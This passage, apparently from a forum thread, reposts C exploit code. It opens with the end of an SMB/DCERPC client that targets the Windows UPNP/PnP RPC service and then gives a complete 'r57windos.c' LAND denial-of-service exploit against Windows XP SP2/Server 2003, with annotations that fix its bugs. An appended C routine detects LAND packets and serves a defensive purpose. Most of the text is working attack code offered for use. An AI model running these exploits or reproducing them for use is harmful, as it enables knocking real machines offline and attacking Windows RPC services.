        printf("\033[0;31mFailed\033[0;39m\n");
        exit(-1);
    }
    printf("\033[0;32mOK\033[0;39m\n");

    printf("[*] SMB Session setup ANDX 2 with %s: ", argv[1]);
    if ((send(sock, SMB_Session_setup_ANDX2,
              sizeof(SMB_Session_setup_ANDX2)-1, 0)) < 0) {
        perror("SMB_Session_setup_ANDX2");
        exit(-1);
    }
    ret = recv(sock, response, 4096, 0);
    if ((ret <= 10 || response[9] != 0)) {
        printf("\033[0;31mFailed\033[0;39m\n");
        exit(-1);
    }
    printf("\033[0;32mOK\033[0;39m\n");

    /* Build the Tree Connect AndX for \\<ip>\IPC$ and patch its
     * NetBIOS length (byte 3) and byte-count field (byte 45). */
    temp = tConXpacket;
    printf("[*] SMB Tree Connect ANDX with %s: ", argv[1]);
    memcpy(tConXpacket, SMB_TreeConnect_ANDX,
           sizeof(SMB_TreeConnect_ANDX)-1);
    temp += sizeof(SMB_TreeConnect_ANDX) -1;
    sprintf(UNC, "\\\\%s\\IPC$", targetIP);
    setup_tCon(UNC, temp);
    templen = (strlen(UNC)*2) +9;
    tConXpacket[3] = 43 + templen;
    templen -= 2;
    memcpy((unsigned long *)&tConXpacket[45], &templen, 1);
    if ((send(sock, tConXpacket, (sizeof(SMB_TreeConnect_ANDX) + templen), 0)) < 0) {
        perror("SMB_TreeConnect_ANDX");
        exit(-1);
    }
    ret = recv(sock, response, 4096, 0);
    if ((ret <= 10 || response[9] != 0)) {
        printf("\033[0;31mFailed\033[0;39m\n");
        exit(-1);
    }
    printf("\033[0;32mOK\033[0;39m\n");

    printf("[*] SMB NT Create ANDX Request to %s: ", argv[1]);
    if ((send(sock, SMB_NTCreate_ANDX_Request,
              sizeof(SMB_NTCreate_ANDX_Request)-1, 0)) < 0) {
        perror("SMB_NTCreate_ANDX_Request");
        exit(-1);
    }
    ret = recv(sock, response, 4096, 0);
    if (ret <= 10) {
        printf("\033[0;31mFailed\033[0;39m\n");
        exit(-1);
    }
    printf("\033[0;32mOK\033[0;39m\n");

    printf("[*] DCERPC Bind to UPNP RPC Service at %s: ", argv[1]);
    if ((send(sock, DCERPC_Bind_RPC_Service,
              sizeof(DCERPC_Bind_RPC_Service)-1, 0)) < 0) {
        perror("DCERPC_Bind_RPC_Service");
        exit(-1);
    }
    ret = recv(sock, response, 4096, 0);
    if (ret <= 10) {
        printf("\033[0;31mFailed\033[0;39m\n");
        exit(-1);
    }
    printf("\033[0;32mOK\033[0;39m\n");

    printf("[*] PNP_GetDeviceList request to %s: ", argv[1]);
    send(sock, PNP_GetDeviceList_Request, sizeof(PNP_GetDeviceList_Request)-1, 0);
    recv(sock, response, 4096, 0);
    printf("\033[0;32mOK\033[0;39m\n");
    return 0;
}

and this one too


Code:
/*
Windows Server 2003 and XP SP2 remote DoS exploit
Tested under OpenBSD 3.6 at WinXP SP 2
Vuln by Dejan Levaja <dejan_@_levaja.com>
(c)oded by __blf 2005 RusH Security Team , http://rst.void.ru
Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor
Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy
All rights reserved.
*/

/* No headers at all in the posted copy; these are the ones the BSD-style
 * struct ip / struct tcphdr fields, the socket calls and the EX_* exit
 * codes below need. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sysexits.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>

//checksum function by r0ach
u_short checksum (u_short *addr, int len)
{
    u_short *w = addr;
    int i = len;
    int sum = 0;
    u_short answer;
    while (i > 1)   /* "i > 0" in the post, which overreads on an odd length */
    {
        sum += *w++;
        i-=2;
    }
    if (i == 1) sum += *(u_char *)w;
    sum = (sum >> 16) + (sum & 0xffff);
    sum = sum + (sum >> 16);
    return (~sum);
}

int main(int argc, char ** argv)
{
    struct in_addr src, dst;
    struct sockaddr_in sin;
    struct _pseudoheader {
        struct in_addr source_addr;
        struct in_addr destination_addr;
        u_char zero;
        u_char protocol;
        u_short length;
    } pseudoheader;
    struct ip * iph;
    struct tcphdr * tcph;
    int mysock;
    u_char * packet;
    u_char * pseudopacket;
    int on = 1;
    if( argc != 3)
    {
        fprintf(stderr, "r57windos.c by __blf\n");
        fprintf(stderr, "RusH Security Team\n");
        fprintf(stderr, "Usage: %s <dest ip> <dest port>\n", argv[0]);
        return EX_USAGE;
    }
    if ((packet = (u_char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL)
    {
        perror("malloc()\n");
        return EX_OSERR;
    }
    inet_aton(argv[1], &src);   /* source and destination are the same address */
    inet_aton(argv[1], &dst);
    iph = (struct ip *) packet;
    iph->ip_v = IPVERSION;
    iph->ip_hl = 5;
    iph->ip_tos = 0;
    iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr));
    iph->ip_off = htons(IP_DF);
    iph->ip_ttl = 255;
    iph->ip_p = IPPROTO_TCP;
    iph->ip_sum = 0;
    iph->ip_src = src;
    iph->ip_dst = dst;
    tcph = (struct tcphdr *)(packet +sizeof(struct ip));
    tcph->th_sport = htons(atoi(argv[2]));   /* source port equals destination port */
    tcph->th_dport = htons(atoi(argv[2]));
    tcph->th_seq = ntohl(rand());
    tcph->th_ack = rand();
    tcph->th_off = 5;
    tcph->th_flags = TH_SYN; // setting up TCP SYN flag here
    tcph->th_win = htons(512);
    tcph->th_sum = 0;
    tcph->th_urp = 0;
    /* TCP checksum is computed over the pseudo-header plus the TCP header */
    pseudoheader.source_addr = src;
    pseudoheader.destination_addr = dst;
    pseudoheader.zero = 0;
    pseudoheader.protocol = IPPROTO_TCP;
    pseudoheader.length = htons(sizeof(struct tcphdr));
    if((pseudopacket = (u_char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL)
    {
        perror("malloc()\n");
        return EX_OSERR;
    }
    memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader));
    memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr));
    tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr));
    mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
    if(mysock < 0)   /* the post tested "!mysock", which misses the -1 error return */
    {
        perror("socket!\n");
        return EX_OSERR;
    }
    if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
    {
        perror("setsockopt");
        shutdown(mysock, 2);
        return EX_OSERR;
    }
    sin.sin_family = PF_INET;
    sin.sin_addr = dst;
    sin.sin_port = htons(80);
    if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1)
    {
        perror("sendto()\n");
        shutdown(mysock, 2);
        return EX_OSERR;
    }
    printf("Packet sent. Remote machine should be down.\n");
    shutdown(mysock, 2);
    return EX_OK;
}
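An added example, not from this thread or any of its posters: the second program above sends a TCP SYN whose source address and port are identical to its destination address and port. A packet filter or IDS catches that pattern by comparing the two pairs of header fields; the C check below does exactly that on a raw IPv4/TCP buffer, rejects truncated or non-TCP input, and tests itself against sample packets constructed inline (the 10.0.0.5 addresses are made up).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Result of inspecting one packet. */
struct land_verdict {
    int is_land;      /* 1 if src==dst and sport==dport */
    int syn;          /* 1 if the TCP SYN flag is set */
    uint32_t addr;    /* source address, host byte order */
    uint16_t port;    /* source port, host byte order */
};

/* Big-endian (network order) field accessors. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p) { return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3]; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = v >> 8; p[1] = v & 0xff; }
static void wr32(uint8_t *p, uint32_t v) { p[0] = v >> 24; p[1] = (v >> 16) & 0xff; p[2] = (v >> 8) & 0xff; p[3] = v & 0xff; }

/* Returns 1 if pkt holds an IPv4/TCP packet whose source address and port
 * equal its destination address and port; 0 otherwise, including for any
 * truncated or non-TCP input. Checksums are deliberately not verified: a
 * filter should drop such a packet whether or not its checksum is right. */
int is_land_packet(const uint8_t *pkt, size_t len, struct land_verdict *out)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return 0;                              /* not an IPv4 header */
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    if (ihl < 20 || len < ihl + 20 || pkt[9] != 6)
        return 0;                              /* bad IHL, truncated, or not TCP */
    const uint8_t *tcp = pkt + ihl;
    uint32_t src = rd32(pkt + 12), dst = rd32(pkt + 16);
    uint16_t sport = rd16(tcp), dport = rd16(tcp + 2);
    int land = (src == dst) && (sport == dport);
    if (out) {
        out->is_land = land;
        out->syn = (tcp[13] & 0x02) != 0;
        out->addr = src;
        out->port = sport;
    }
    return land;
}

/* Constructed test input: a 40-byte IPv4+TCP packet with no options and
 * zero checksums, the same shape r57windos.c builds. Returns its length. */
size_t build_sample(uint8_t *buf, uint32_t src, uint32_t dst,
                    uint16_t sport, uint16_t dport, uint8_t flags)
{
    memset(buf, 0, 40);
    buf[0] = 0x45;                 /* version 4, IHL 5 */
    wr16(buf + 2, 40);             /* total length */
    buf[8] = 255;                  /* TTL */
    buf[9] = 6;                    /* protocol: TCP */
    wr32(buf + 12, src); wr32(buf + 16, dst);
    wr16(buf + 20, sport); wr16(buf + 22, dport);
    buf[32] = 0x50;                /* data offset 5 (20-byte TCP header) */
    buf[33] = flags;               /* 0x02 = SYN */
    return 40;
}

int main(void)
{
    uint8_t pkt[40];
    struct land_verdict v;
    /* 10.0.0.5:80 -> 10.0.0.5:80 with SYN: a constructed LAND packet */
    size_t n = build_sample(pkt, 0x0a000005, 0x0a000005, 80, 80, 0x02);
    if (is_land_packet(pkt, n, &v))
        printf("LAND packet: src==dst, sport==dport %u, syn=%d\n", v.port, v.syn);
    return 0;
}
```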
 